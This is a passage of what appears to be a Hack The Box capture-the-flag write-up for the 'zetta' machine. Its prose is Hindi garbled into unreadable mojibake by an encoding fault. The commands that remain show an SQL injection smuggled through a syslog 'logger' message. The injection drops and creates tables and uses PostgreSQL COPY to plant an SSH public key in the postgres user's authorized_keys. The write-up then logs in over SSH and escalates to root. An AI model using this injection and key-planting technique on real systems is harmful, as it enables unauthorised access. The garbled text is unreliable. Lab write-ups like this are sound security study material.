logger -p local7.info "qwerty',\$\$2020-02-02\$\$);DROP TABLE if exists ralf;CREATE TABLE ralf(t TEXT);INSERT INTO ralf(t) VALUES(\$\$RALF\$\$);SELECT * FROM ralf;COPY ralf(t) TO \$\$/tmp/ralf\$\$;-- -"

рдЫрд╡рд┐

рдареАрдХред рд╣рдо ssh рдХреБрдВрдЬреА рдЬреЗрдирд░реЗрдЯ рдХрд░реЗрдВрдЧреЗ рдФрд░ рдкреЛрд╕реНрдЯ рдХреА рдЧрдИ рд╕реЗрд╡рд╛ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреА рд╣реЛрдо рдбрд╛рдпрд░реЗрдХреНрдЯрд░реА рдореЗрдВ рд╕рд░реНрд╡рд░ рдХреА рд╕рд╛рд░реНрд╡рдЬрдирд┐рдХ рдХреБрдВрдЬреА рд▓рд┐рдЦреЗрдВрдЧреЗ: /var/lib/postgresql/.ssh/authorized_keysред

рдЫрд╡рд┐

logger -p local7.info -s "qwerty',\$\$2020-02-02\$\$);DROP TABLE if exists ralf;CREATE TABLE ralf(t TEXT);INSERT INTO ralf(t) VALUES(\$\$ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDRC9/M7mhpZ/0Rs/HyPIC58k3qDu3xRVmMgt/gky8VCpH49WVkkLpW0tFNL1Z7d/NN8efres0+aG7VJXop20P4uO7BT4ikK8ccDzXKHlSVPweevKu8AAVqu98mKxXJBNI/uQ1giv+zwS23hbe5DQTGldeOSPzClxal8sj99kqCk1aN8Cs7I6+vBcOkHoMVKB8dR9Hu0ZwvLzvWDnnBR1txmjrNDPt25I+2gNc3JYvqIS2QIV2DSdh5UoFKVzA27Mav3A0yL6zJjUynnluAa27HMsKdvrfA0Q5zIY3F/snHCl4X/wxZh4o9bnfxUFt6OC0sLxk5ro1Vw6EjgACZj+aFoFXBMgX59YpUVtXbXvN/ACMkIyLh/f7CvqWDD9sppZtcBKVYB1jzlqIG5ekgv55aCrTeX9CuS9YbZrrjZC2Dos7YTOwD9TBItlR8VcU0JcR1GiS+GHZv0Rm9pizHchOiPocWqdryoGqfTfCav4AvrhDHtzk4P/C1fa3flwb3NxE= root@Ralf-PC\$\$);SELECT * FROM ralf;COPY ralf(t) TO \$\$/var/lib/postgresql/.ssh/authorized_keys\$\$;-- -"

рдЕрдм рд╣рдо ssh рдкрд░ рдЪрд▓рддреЗ рд╣реИрдВред

ssh -i psg_id_rsa postgres@zetta.htb

рдЫрд╡рд┐

рд╣рдо рдкреЛрд╕реНрдЯрдЧреНрд░реЗрдЬ рдХреЗ рдЗрддрд┐рд╣рд╛рд╕ рдХреЛ рджреЗрдЦрддреЗ рд╣реИрдВред

рдЫрд╡рд┐

рдФрд░ рд╣рдо рдкрд╛рд╕рд╡рд░реНрдб рдвреВрдВрдврддреЗ рд╣реИрдВред рд╣рдо рдЯреВ-рдбреВ рд╕реВрдЪреА рд╕реЗ рдкрд╛рд╕рд╡рд░реНрдб рдирд┐рдпрдо рдХреЛ рдпрд╛рдж рдХрд░рддреЗ рд╣реИрдВ, рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЛ рд░реВрдЯ рд╕реЗ рдмрджрд▓реЗрдВ, рдФрд░ рд▓реЙрдЧ рдЗрди рдХрд░реЗрдВред

рдЫрд╡рд┐

рд╣рдо рдкреВрд░реЗ рдЕрдзрд┐рдХрд╛рд░ рдХреЗ рд╕рд╛рде рд╣реИрдВ!

рдЖрдк рд╣рдорд╕реЗ рдЯреЗрд▓реАрдЧреНрд░рд╛рдо рдкрд░ рдЬреБрдбрд╝ рд╕рдХрддреЗ рд╣реИрдВ ред рдЖрдЗрдП рдПрдХ рд╕рдореБрджрд╛рдп рдХреЛ рдПрдХ рд╕рд╛рде рд░рдЦреЗрдВ рдЬрд┐рд╕рдореЗрдВ рдРрд╕реЗ рд▓реЛрдЧ рд╣реЛрдВрдЧреЗ рдЬреЛ рдЖрдИрдЯреА рдХреЗ рдХрдИ рдХреНрд╖реЗрддреНрд░реЛрдВ рдореЗрдВ рдкрд╛рд░рдВрдЧрдд рд╣реИрдВ, рдлрд┐рд░ рд╣рдо рд╣рдореЗрд╢рд╛ рдХрд┐рд╕реА рднреА рдЖрдИрдЯреА рдФрд░ рд╕реВрдЪрдирд╛ рд╕реБрд░рдХреНрд╖рд╛ рдореБрджреНрджреЛрдВ рдкрд░ рдПрдХ рджреВрд╕рд░реЗ рдХреА рдорджрдж рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред

More articles:


All Articles